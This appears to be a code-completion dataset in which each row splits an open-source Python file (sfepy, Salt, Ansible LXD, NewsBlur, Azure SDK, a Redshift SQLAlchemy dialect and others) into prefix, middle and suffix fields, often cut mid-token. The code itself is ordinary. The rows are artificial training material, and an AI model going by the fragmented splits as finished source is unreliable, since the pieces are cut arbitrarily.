repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
RexFuzzle/sfepy
|
sfepy/terms/terms_basic.py
|
Python
|
bsd-3-clause
| 12,864
| 0.003887
|
import numpy as nm
from sfepy.base.base import assert_
from sfepy.linalg import dot_sequences
from sfepy.terms.terms import Term, terms
class IntegrateVolumeTerm(Term):
r"""
Evaluate (weighted) variable in a volume region.
Depending on evaluation mode, integrate a variable over a volume region
('eval'), average it in elements ('el_avg') or interpolate it into volume
quadrature points ('qp').
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Omega y \mbox{ , } \int_\Omega \ul{y} \\
\int_\Omega c y \mbox{ , } \int_\Omega c \ul{y}
.. math::
\mbox{vector for } K \from \Ical_h:
\int_{T_K} y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} \ul{y} / \int_{T_K} 1 \\
\mbox{vector for } K \from \Ical_h:
\int_{T_K} c y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} c \ul{y} / \int_{T_K} 1
.. math::
y|_{qp} \mbox{ , } \ul{y}|_{qp} \\
c y|_{qp} \mbox{ , } c \ul{y}|_{qp}
:Arguments:
- material : :math:`c` (optional)
- parameter : :math:`y` or :math:`\ul{y}`
"""
name = 'ev_volume_integrate'
arg_types = ('opt_material', 'parameter')
arg_shapes = [{'opt_material' : '1, 1', 'parameter' : 1},
{'opt_material' : None},
{'opt_material' : '1, 1', 'parameter' : 'D'},
{'opt_material' : None}]
@staticmethod
def function(out, val_qp, vg, fmode):
if fmode == 2:
out[:] = val_qp
status = 0
else:
status = vg.integrate(out, val_qp, fmode)
return status
def get_fargs(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
vg, _ = self.get_mapping(parameter)
val_qp = self.get(parameter, 'val')
if material is not None:
val_qp *= material
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
return val_qp, vg, fmode
def get_eval_shape(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_el, n_qp, dim, n_en, n_c = self.get_data_shape(parameter)
if mode != 'qp':
n_qp = 1
return (n_el, n_qp, n_c, 1), parameter.dtype
class IntegrateSurfaceTerm(Term):
r"""
Evaluate (weighted) variable in a surface region.
Depending on evaluation mode, integrate a variable over a surface region
('eval'), average it in element faces ('el_avg') or interpolate it into
surface quadrature points ('qp'). For vector variables, setting `term_mode`
to `'flux'` leads to computing corresponding fluxes for the three modes
instead.
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:De
|
finition:
.. math::
\int_\Gamma y \mbox{ , } \int_\Gamma \ul{y}
\mbox{ , } \int_\Gamma \ul{y} \cdot \ul{n} \\
\int_\Gamma c y \mbox{ , } \int_\Gamma c \ul{y}
\mbox{ , } \int_\Gamma c \ul{y} \cdot \ul{n} \mbox{ flux }
.. math::
\mbox{vector for } K \from \Ical_h:
\int_{T_K} y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} \ul{y} / \int_{T_K} 1 \mbox{ , }
\int_{T_K} (\ul{y} \cdot \ul{n}) / \i
|
nt_{T_K} 1 \\
\mbox{vector for } K \from \Ical_h:
\int_{T_K} c y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} c \ul{y} / \int_{T_K} 1 \mbox{ , }
\int_{T_K} (c \ul{y} \cdot \ul{n}) / \int_{T_K} 1
.. math::
y|_{qp} \mbox{ , } \ul{y}|_{qp}
\mbox{ , } (\ul{y} \cdot \ul{n})|_{qp} \mbox{ flux } \\
c y|_{qp} \mbox{ , } c \ul{y}|_{qp}
\mbox{ , } (c \ul{y} \cdot \ul{n})|_{qp} \mbox{ flux }
:Arguments:
- material : :math:`c` (optional)
- parameter : :math:`y` or :math:`\ul{y}`
"""
name = 'ev_surface_integrate'
arg_types = ('opt_material', 'parameter')
arg_shapes = [{'opt_material' : '1, 1', 'parameter' : 1},
{'opt_material' : None},
{'opt_material' : '1, 1', 'parameter' : 'D'},
{'opt_material' : None}]
integration = 'surface'
@staticmethod
def function(out, val_qp, sg, fmode):
if fmode == 2:
out[:] = val_qp
status = 0
elif fmode == 5:
normal = sg.normal
out[:] = dot_sequences(val_qp, normal)
status = 0
else:
status = sg.integrate(out, val_qp, fmode)
return status
def get_fargs(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
sg, _ = self.get_mapping(parameter)
val_qp = self.get(parameter, 'val')
if material is not None:
val_qp *= material
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
if term_mode == 'flux':
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
if n_c == dim:
fmode += 3
return val_qp, sg, fmode
def get_eval_shape(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
if mode != 'qp':
n_qp = 1
if term_mode == 'flux':
n_c = 1
return (n_fa, n_qp, n_c, 1), parameter.dtype
class IntegrateVolumeOperatorTerm(Term):
r"""
Volume integral of a test function weighted by a scalar function
:math:`c`.
:Definition:
.. math::
\int_\Omega q \mbox{ or } \int_\Omega c q
:Arguments:
- material : :math:`c` (optional)
- virtual : :math:`q`
"""
name = 'dw_volume_integrate'
arg_types = ('opt_material', 'virtual')
arg_shapes = [{'opt_material' : '1, 1', 'virtual' : (1, None)},
{'opt_material' : None}]
@staticmethod
def function(out, material, bf, geo):
bf_t = nm.tile(bf.transpose((0, 1, 3, 2)), (out.shape[0], 1, 1, 1))
bf_t = nm.ascontiguousarray(bf_t)
if material is not None:
status = geo.integrate(out, material * bf_t)
else:
status = geo.integrate(out, bf_t)
return status
def get_fargs(self, material, virtual,
mode=None, term_mode=None, diff_var=None, **kwargs):
assert_(virtual.n_components == 1)
geo, _ = self.get_mapping(virtual)
return material, geo.bf, geo
class IntegrateSurfaceOperatorTerm(IntegrateVolumeOperatorTerm):
r"""
Surface integral of a test function weighted by a scalar function
:math:`c`.
:Definition:
.. math::
\int_{\Gamma} q \mbox{ or } \int_\Gamma c q
:Arguments:
- material : :math:`c` (optional)
- virtual : :math:`q`
"""
name = 'dw_surface_integrate'
arg_types = ('opt_material', 'virtual')
arg_shapes = [{'opt_material' : '1, 1', 'virtual' : (1, None)},
{'opt_material' : None}]
integration = 'surface'
class VolumeTerm(Term):
r"""
Volume of a domain. Uses approximation of the parameter variable.
:Definition:
.. math::
\int_\Omega 1
:Arguments:
- parameter : any variable
"""
name = 'd_volume'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
@staticmethod
def function(out, geo):
out[:] = geo.volume
return 0
def get_fargs(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
geo, _ = self.get_mapping(parameter)
return geo,
def get_eval_shape(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_cell, n_qp, dim, n_n, n_c = self.get_data_shape(parameter)
return (n_cell, 1, 1, 1), parameter.dtype
class SurfaceTerm(VolumeTerm):
r"""
Surface of a domain. Uses approximation of the parameter variable.
:Definition:
.. math::
\int_\Gamma 1
:Arguments:
- parameter : any variable
"""
name = 'd_surface'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
integration = 'surface'
|
saltstack/salt
|
tests/unit/test_fileserver.py
|
Python
|
apache-2.0
| 2,610
| 0.000766
|
"""
:codeauthor: Joao Mesquita <jmesquita@sangoma.com>
"""
import datetime
import os
import time
import salt.utils.files
from salt import fileserve
|
r
from tests.support.helpers import with_tempdir
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
class MapDiffTestCase(TestCase):
def test_diff_with_diffent_keys(self):
"""
Test that different maps are indeed reported different
"""
map1
|
= {"file1": 1234}
map2 = {"file2": 1234}
assert fileserver.diff_mtime_map(map1, map2) is True
def test_diff_with_diffent_values(self):
"""
Test that different maps are indeed reported different
"""
map1 = {"file1": 12345}
map2 = {"file1": 1234}
assert fileserver.diff_mtime_map(map1, map2) is True
class VCSBackendWhitelistCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {fileserver: {}}
def test_whitelist(self):
opts = {
"fileserver_backend": ["roots", "git", "s3fs", "hgfs", "svn"],
"extension_modules": "",
}
fs = fileserver.Fileserver(opts)
assert sorted(fs.servers.whitelist) == sorted(
["git", "gitfs", "hg", "hgfs", "svn", "svnfs", "roots", "s3fs"]
), fs.servers.whitelist
@with_tempdir()
def test_future_file_list_cache_file_ignored(self, cachedir):
opts = {
"fileserver_backend": ["roots"],
"cachedir": cachedir,
"extension_modules": "",
}
back_cachedir = os.path.join(cachedir, "file_lists/roots")
os.makedirs(os.path.join(back_cachedir))
# Touch a couple files
for filename in ("base.p", "foo.txt"):
with salt.utils.files.fopen(
os.path.join(back_cachedir, filename), "wb"
) as _f:
if filename == "base.p":
_f.write(b"\x80")
# Set modification time to file list cache file to 1 year in the future
now = datetime.datetime.utcnow()
future = now + datetime.timedelta(days=365)
mod_time = time.mktime(future.timetuple())
os.utime(os.path.join(back_cachedir, "base.p"), (mod_time, mod_time))
list_cache = os.path.join(back_cachedir, "base.p")
w_lock = os.path.join(back_cachedir, ".base.w")
ret = fileserver.check_file_list_cache(opts, "files", list_cache, w_lock)
assert (
ret[1] is True
), "Cache file list cache file is not refreshed when future modification time"
|
rosegun38/LintCode
|
Two_Strings_Are_Anagrams/Solution.py
|
Python
|
gpl-3.0
| 307
| 0
|
class Solution:
"""
@param s: The first string
@param b: The second string
@return true or false
"""
# Time: is equal to sorted O(nlogn)
# Space: O(1)
def anagram(self, s, t):
# write y
|
our code here
|
s = sorted(s)
t = sorted(t)
return s == t
|
yaolei313/python-study
|
base/test.py
|
Python
|
gpl-2.0
| 365
| 0.00554
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
sql_template0 = "
|
""alter table _shadow_orders_{0}_ modify fingerprint text DEFAULT '' COMMENT '下单fingerprint';""
|
"
if __name__ == '__main__':
for index in range(0, 50):
print(sql_template0.format(index))
print("------")
for index in range(50, 100):
print(sql_template0.format(index))
|
SublimeText/VintageEx
|
plat/__init__.py
|
Python
|
mit
| 109
| 0
|
import subl
|
ime
HOST_PLATFORM = sublime.platform()
WINDOWS = 'windows'
LINUX = 'linux'
OSX = 'osx'
| |
camradal/ansible
|
lib/ansible/module_utils/lxd.py
|
Python
|
gpl-3.0
| 6,180
| 0.004045
|
# -*- coding: utf-8 -*-
# (c) 2016, Hiroaki Nakamura <hnakamur@gmail.com>
#
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
try:
import json
except ImportError:
import simplejson as json
# httplib/http.client connection using unix domain socket
import socket
import ssl
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
# Python 3
from http.client import HTTPConnection, HTTPSConnection
class UnixHTTPConnection(HTTPConnection):
def __init__(self, path):
HTTPConnection.__init__(self, 'localhost')
self.path = path
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.path)
self.sock = sock
from ansible.module_utils.urls import generic_urlparse
try:
from urlparse import urlparse
except ImportError:
# Python 3
from url.parse import urlparse
class LXDClientException(Exception):
def __init__(self, msg, **kwargs):
self.msg = msg
self.kwargs = kwargs
class LXDClient(object):
def __init__(self, url, key_file=None, cert_file=None, debug=False):
"""LXD Client.
:param url: The URL of the LXD server. (e.g. unix:/var/lib/lxd/unix.socket or https://127.0.0.1)
:type url: ``str``
:param key_file: The path of the client certificate key file.
:type key_file: ``str``
:param cert_file: The path of the client certificate file.
:type cert_file: ``str``
:param debug: The debug flag. The request and response are stored in logs when debug is true.
:type debug: ``bool``
"""
self.url = url
self.debug = debug
self.logs = []
if url.startswith('https:'):
self.cert_file = cert_file
self.key_file = key_file
parts = generic_urlparse(urlparse(self.url))
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(cert_file, keyfile=key_file)
self.connection = HTTPSConnection(parts.get('netloc'), context=ctx)
elif url.startswith('unix:'):
unix_socket_path = url[len('unix:'):]
self.connection = UnixHTTPConnection(unix_socket_path)
else:
raise LXDClientException('URL scheme must be unix: or https:')
def do(self, method, url, body_json=None, ok_error_codes=None, timeout=None):
resp_json = self._send_request(method, url, body_json=body_json, ok_error_codes=ok_error_codes, t
|
imeout=timeout)
if resp_json['type'] == 'async':
url = '{0}/wait'.format(resp_json['operation'])
resp_json = self._send_request('GET', url)
if resp_json['metadata']['status'] != 'Success':
|
self._raise_err_from_json(resp_json)
return resp_json
def authenticate(self, trust_password):
body_json = {'type': 'client', 'password': trust_password}
return self._send_request('POST', '/1.0/certificates', body_json=body_json)
def _send_request(self, method, url, body_json=None, ok_error_codes=None, timeout=None):
try:
body = json.dumps(body_json)
self.connection.request(method, url, body=body)
resp = self.connection.getresponse()
resp_json = json.loads(resp.read())
self.logs.append({
'type': 'sent request',
'request': {'method': method, 'url': url, 'json': body_json, 'timeout': timeout},
'response': {'json': resp_json}
})
resp_type = resp_json.get('type', None)
if resp_type == 'error':
if ok_error_codes is not None and resp_json['error_code'] in ok_error_codes:
return resp_json
if resp_json['error'] == "Certificate already in trust store":
return resp_json
self._raise_err_from_json(resp_json)
return resp_json
except socket.error as e:
raise LXDClientException('cannot connect to the LXD server', err=e)
def _raise_err_from_json(self, resp_json):
err_params = {}
if self.debug:
err_params['logs'] = self.logs
raise LXDClientException(self._get_err_from_resp_json(resp_json), **err_params)
@staticmethod
def _get_err_from_resp_json(resp_json):
err = None
metadata = resp_json.get('metadata', None)
if metadata is not None:
err = metadata.get('err', None)
if err is None:
err = resp_json.get('error', None)
return err
|
htimko/ArcPIC
|
pic2d/tests/rngtestAna.py
|
Python
|
gpl-3.0
| 571
| 0.019264
|
#!/usr/bin/env python
import matplotlib.pyplot a
|
s plt
import os
import math as m
import numpy as np
def Gaus(v,mu,sigma):
"Gaus
|
sian distribution"
return np.exp(-0.5*((v-mu)/sigma)**2)/(sigma*m.sqrt(2*m.pi))
mu = 0.5;
sigma = 1.5;
print "reading file..."
gausFile = open("gausRandom.out", 'r')
gausNums = map(float,gausFile.read().split())
gausFile.close()
gausBins = np.linspace(mu-5*sigma, mu+5*sigma);
gausPoints = gausBins[:-1] - np.diff(gausBins)
plt.hist(gausNums,bins=gausBins,normed=True);
plt.plot(gausPoints, Gaus(gausPoints, mu, sigma))
plt.show()
|
BechtelCIRT/pivoteer
|
pivoteer/__init__.py
|
Python
|
mit
| 74
| 0
|
from
|
pivoteer import *
from pivotEngine import *
from pivotUtils import *
| |
lmazuel/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_backend_address_pool.py
|
Python
|
mit
| 2,589
| 0.001545
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayBackendAddressPool(SubResource):
"""Backend Address Pool of an application gateway.
:param id: Resource ID.
:type id: str
:param backend_ip_configurations: Collection of references to IPs defined
in network interfaces.
:type backend_ip_configurations:
list[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceIPConfiguration]
:param backend_addresses: Backend addresses
:type backend_addresses:
list[~azure.mgmt.network.v2018_01_01.models.ApplicationGatewayBackendAddress]
:param provisioning_state: Provisioning state of the backend address pool
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Resource that is unique within a resource group. This name
can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:typ
|
e type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'backend_ip_configurations': {'key': 'properties.backendIPConfigurations', 'type': '[NetworkInterfaceIPConfiguratio
|
n]'},
'backend_addresses': {'key': 'properties.backendAddresses', 'type': '[ApplicationGatewayBackendAddress]'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewayBackendAddressPool, self).__init__(**kwargs)
self.backend_ip_configurations = kwargs.get('backend_ip_configurations', None)
self.backend_addresses = kwargs.get('backend_addresses', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.name = kwargs.get('name', None)
self.etag = kwargs.get('etag', None)
self.type = kwargs.get('type', None)
|
matt-jordan/mjmud
|
lib/transports/ws_receiver.py
|
Python
|
mit
| 1,886
| 0
|
#
# mjmud - The neverending MUD project
#
# Copyright (c) 2014, Matt Jordan
#
# See https://github.com/matt-jordan/mjmud for more information about the
# project. Please do not contact the maintainers of the project for information
# or assistance. The project uses Github for these purposes.
#
# This program is free software, distributed under the conditions of the MIT
# License (MIT). See the LICENSE file at the top of the source tree for
# details.
from zope.interface import Interface
class IWebSocketReceiver(Interface):
def on_message_received(protocol, json_msg):
"""Receive and process a JSON message
Keyword Arguments:
protocol -- the websocket protocol that received the JSON message
json_msg -- the JSON object received from the protocol's peer
"""
def on_connected(protocol, peer):
"""Called when a connection is established
Keyword Arguments:
protocol -- the websocket protocol that is serving the peer
peer
|
-- the peer that connected
"""
def on_closed(protocol, was_clean, code, reason):
"""Called when a connection is closed
Keyword Arguments:
protocol -- the websocket protocol that dis
|
connected
was_clean -- true if the handshake occurred; false otherwise
code -- numeric code describing the disconnection
reason -- why the disconnection occurred
"""
class IWebSocketClientReceiver(Interface):
def on_connection_failed(protocol, connector, reason):
"""Called when a client connection fails
Keyword Arguments:
protocol -- the websocket client protocol that failed
connector -- the connection object
reason -- why the connection failed
"""
class ReceiverError(Exception):
"""An exception occurred in a protocol receiver"""
pass
|
nriley/NewsBlur
|
apps/rss_feeds/views.py
|
Python
|
mit
| 21,500
| 0.005302
|
import datetime
from urlparse import urlparse
from utils import log as logging
from django.shortcuts import get_object_or_404, render_to_response
from django.views.decorators.http import condition
from django.http import HttpResponseForbidden, HttpResponseRedirect, HttpResponse, Http404
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
# from django.db import IntegrityError
from apps.rss_feeds.models import Feed, merge_feeds
from apps.rss_feeds.models import MFetchHistory
from apps.rss_feeds.models import MFeedIcon
from apps.push.models import PushSubscription
from apps.analyzer.models import get_classifiers_for_user
from apps.reader.models import UserSubscription
from apps.rss_feeds.models import MStory
from utils.user_functions import ajax_login_required
from utils import json_functions as json, feedfinder2 as feedfinder
from utils.feed_functions import relative_timeuntil, relative_timesince
from utils.user_functions import get_user
from utils.view_functions import get_argument_or_404
from utils.view_functions import required_params
from utils.view_functions import is_true
from vendor.timezones.utilities import localtime_for_timezone
from utils.ratelimit import ratelimit
IGNORE_AUTOCOMPLETE = [
"facebook.com/feeds/notifications.php",
"inbox",
"secret",
"password",
"latitude",
]
@ajax_login_required
@json.json_view
def search_feed(request):
address = request.REQUEST.get('address')
offset = int(request.REQUEST.get('offset', 0))
if not address:
return dict(code=-1, message="Please provide a URL/address.")
logging.user(request.user, "~FBFinding feed (search_feed): %s" % address)
ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META['REMOTE_ADDR']
logging.user(request.user, "~FBIP: %s" % ip)
aggressive = request.user.is_authenticated()
feed = Feed.get_feed_from_url(address, create=False, aggressive=aggressive, offset=offset)
if feed:
return feed.canonical()
else:
return dict(code=-1, message="No feed found matching that XML or website address.")
@json.json_view
def load_single_feed(request, feed_id):
user = get_user(request)
feed = get_object_or_404(Feed, pk=feed_id)
classifiers = get_classifiers_for_user(user, feed_id=feed.pk)
payload = feed.canonical(full=True)
payload['classifiers'] = classifiers
return payload
def feed_favicon_etag(request, feed_id):
try:
feed_icon = MFeedIcon.objects.get(feed_id=feed_id)
except MFeedIcon.DoesNotExist:
return
return feed_icon.color
@condition(etag_func=feed_favicon_etag)
def load_feed_favicon(request, feed_id):
not_found = False
try:
feed_icon = MFeedIcon.objects.get(feed_id=feed_id)
except MFeedIcon.DoesNotExist:
not_found = True
if not_found or not feed_icon.data:
return HttpResponseRedirect(settings.MEDIA_URL + 'img/icons/circular/world.png')
icon_data = feed_icon.data.decode('base64')
return HttpResponse(icon_data, mimetype='image/png')
@json.json_view
def feed_autocomplete(request):
query = request.GET.get('term') or request.GET.get('query')
version = int(request.GET.get('v', 1))
format = request.GET.get('format', 'autocomplete')
# user = get_user(request)
# if True or not user.profile.is_premium:
# return dict(code=-1, message="Overloaded, no autocomplete results.", feeds=[], term=query)
if not query:
return dict(code=-1, message="Specify a search 'term'.", feeds=[], term=query)
if '.' in query:
try:
parts = urlparse(query)
if not parts.hostname and not query.startswith('http'):
parts = urlparse('http://%s' % query)
if parts.hostname:
query = [parts.hostname]
query.extend([p for p in parts.path.split('/') if p])
query = ' '.join(query)
except:
logging.user(request, "~FGAdd search, could not parse url in ~FR%s" % query)
query_params = query.split(' ')
tries_left = 5
while len(query_params) and tries_left:
tries_left -= 1
feed_ids = Feed.autocomplete(' '.join(query_params))
if feed_ids:
break
else:
query_params = query_params[:-1]
feeds = list(set([Feed.get_by_id(feed_id) for feed_id in feed_ids]))
feeds = [feed for feed in feeds if feed and not feed.branch_from_feed]
feeds = [feed for feed in feeds if all([x not in feed.feed_address for x in IGNORE_AUTOCOMPLETE])]
if format == 'autocomplete':
feeds = [{
'id': feed.pk,
'value': feed.feed_address,
'label': feed.feed_title,
'tagline': feed.data and feed.data.feed_tagline,
'num_subscribers': feed.num_subscribers,
} for feed in feeds]
else:
feeds = [feed.canonical(full=True) for feed in feeds]
feeds = sorted(feeds, key=lambda f: -1 * f['num_subscribers'])
feed_ids = [f['id'] for f in feeds]
feed_icons = dict((icon.feed_id, icon) for icon in MFeedIcon.objects.filter(feed_id__in=feed_ids))
for feed in feeds:
if feed['id'] in feed_icons:
feed_icon = feed_icons[feed['id']]
if feed_icon.data:
feed['favicon_color'] = feed_icon.color
feed['favicon'] = feed_icon.data
logging.user(request, "~FGAdd Search: ~SB%s ~SN(%s matches)" % (query, len(feeds),))
if version > 1:
return {
'feeds': feeds,
'term': query,
}
else:
return feeds
@ratelimit(minutes=1, requests=30)
@json.json_view
def load_feed_statistics(request, feed_id):
user = get_user(request)
timezone = user.profile.timezone
stats = dict()
feed = get_object_or_404(Feed, pk=feed_id)
feed.update_all_statistics()
feed.set_next_scheduled_update(verbose=True, skip_scheduling=True)
feed.save_feed_story_history_statistics()
feed.save_classifier_counts()
# Dates of last and next update
stats['active'] = feed.active
stats['last_update'] = relative_timesince(feed.last_update)
stats['next_update'] = relative_timeuntil(feed.next_scheduled_update)
stats['push'] = feed.is_push
|
if feed.is_push:
try:
stats['push_expires'] = localtime_for_timezone(feed.push.lease_expires,
|
timezone).strftime("%Y-%m-%d %H:%M:%S")
except PushSubscription.DoesNotExist:
stats['push_expires'] = 'Missing push'
feed.is_push = False
feed.save()
# Minutes between updates
update_interval_minutes = feed.get_next_scheduled_update(force=True, verbose=False)
stats['update_interval_minutes'] = update_interval_minutes
original_active_premium_subscribers = feed.active_premium_subscribers
original_premium_subscribers = feed.premium_subscribers
feed.active_premium_subscribers = max(feed.active_premium_subscribers+1, 1)
feed.premium_subscribers += 1
premium_update_interval_minutes = feed.get_next_scheduled_update(force=True, verbose=False,
premium_speed=True)
feed.active_premium_subscribers = original_active_premium_subscribers
feed.premium_subscribers = original_premium_subscribers
stats['premium_update_interval_minutes'] = premium_update_interval_minutes
stats['errors_since_good'] = feed.errors_since_good
# Stories per month - average and month-by-month breakout
average_stories_per_month, story_count_history = feed.average_stories_per_month, feed.data.story_count_history
stats['average_stories_per_month'] = average_stories_per_month
story_count_history = story_count_history and json.decode(story_count_history)
if story_count_history and isinstance(story_count_history, dict):
stats['story_count_history'] = story_count_history['months']
stats['story_days_history'] = sto
|
ScholarTools/pypub
|
pypub/entry_functions.py
|
Python
|
mit
| 1,300
| 0.009231
|
import pypub.publishers.pub_resolve as pub_r
|
esolve
from pypub.paper_info import PaperInfo
def get_paper_info(doi=None, url=None):
"""
Parameters
----------
doi :
url :
Returns
-------
Errors
------
UnsupportedPublisherError : Retriev
|
al of information from this publisher is not yet available
"""
if doi is not None:
publisher = pub_resolve.publisher_from_doi(doi)
paper_info = publisher.get_paper_info(doi=doi)
elif url is not None:
publisher = pub_resolve.publisher_from_url(url)
paper_info = publisher.get_paper_info(url=url)
else:
raise Exception
'''
# Resolve DOI or URL through PyPub pub_resolve methods
publisher_base_url, full_url = pub_resolve.get_publisher_urls(doi=doi, url=url)
pub_dict = pub_resolve.get_publisher_site_info(publisher_base_url)
# Create a PaperInfo object to hold all information and call appropriate scraper
paper_info = PaperInfo(doi=doi, scraper_obj=pub_dict['object'], url=full_url)
paper_info.populate_info()
'''
return paper_info
def get_references():
pass
def get_publisher(doi=None, url=None):
#This could return the publisher given this information.
#This function is low priority
pass
|
bouk/redshift_sqlalchemy
|
redshift_sqlalchemy/dialect.py
|
Python
|
mit
| 34,694
| 0.000461
|
from collections import defaultdict
import numbers
import pkg_resources
import re
import sqlalchemy as sa
from sqlalchemy import schema, exc, inspect, Column
from sqlalchemy.dialects.postgresql.base import PGDDLCompiler, PGCompiler
from sqlalchemy.dialects.postgresql.psycopg2 import PGDialect_psycopg2
from sqlalchemy.engine import reflection
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql.expression import BindParameter, Executable, ClauseElement
from sqlalchemy.types import VARCHAR, NullType
try:
from alembic.ddl import postgresql
except ImportError:
pass
else:
from alembic.ddl.base import RenameTable
compiles(RenameTable, 'redshift')(postgresql.visit_rename_table)
class RedshiftImpl(postgresql.PostgresqlImpl):
__dialect__ = 'redshift'
# Regex for parsing and identity constraint out of adsrc, e.g.:
# "identity"(445178, 0, '1,1'::text)
IDENTITY_RE = re.compile(r"""
"identity" \(
(?P<current>-?\d+)
,\s
(?P<base>-?\d+)
,\s
'(?P<seed>-?\d+),(?P<step>-?\d+)'
.*
\)
""", re.VERBOSE)
# Regex for SQL identifiers (valid table and column names)
SQL_IDENTIFIER_RE = re.compile(r"""
[_a-zA-Z][\w$]* # SQL standard identifier
| # or
(?:"[^"]+")+ # SQL delimited (quoted) identifier
""", re.VERBOSE)
# Regex for foreign key constraints, e.g.:
# FOREIGN KEY(col1) REFERENCES othertable (col2)
# See https://docs.aws.amazon.com/redshift/latest/dg/r_names.html
# for a definition of valid SQL identifiers.
FOREIGN_KEY_RE = re.compile(r"""
^FOREIGN\ KEY \s* \( # FOREIGN KEY, arbitrary whitespace, literal '('
(?P<columns> # Start a group to capture the referring columns
(?: # Start a non-capturing group
\s* # Arbitrary whitespace
([_a-zA-Z][\w$]* | ("[^"]+")+) # SQL identifier
\s* # Arbitrary whitespace
,? # There will be a colon if this isn't the last one
)+ # Close the non-capturing group; require at least one
) # Close the 'columns' group
\s* \) # Arbitrary whitespace and literal ')'
\s* REFERENCES \s*
(?P<referred_table> # Start a group to capture the referred table name
([_a-zA-Z][\w$]* | ("[^"]*")+) # SQL identifier
)
\s* \( \s* # Literal '(' surrounded by arbitrary whitespace
(?P<referred_column> # Start a group to capture the referred column name
([_a-zA-Z][\w$]* | ("[^"]*")+) # SQL identifier
)
\s* \) # Arbitrary whitespace and literal ')'
""", re.VERBOSE)
# Regex for primary key constraints, e.g.:
# PRIMARY KEY (col1, col2)
PRIMARY_KEY_RE = re.compile(r"""
^PRIMARY \s* KEY \s* \( # FOREIGN KEY, arbitrary whitespace, literal '('
(?P<columns> # Start a group to capture column names
(?:
\s* # Arbitrary whitespace
( [_a-zA-Z][\w$]* | ("[^"]*")+ ) # SQL identifier or delimited identifier
\s* # Arbitrary whitespace
,? # There will be a colon if this isn't the last one
)+ # Close the non-capturing group; require at least one
)
\s* \) \s* # Arbitrary whitespace and literal ')'
""", re.VERBOSE)
def _get_relation_key(name, schema):
if schema is None:
return name
else:
return schema + "." + name
def _get_schema_and_relation
|
(key):
if '.' not in key:
return (None, key)
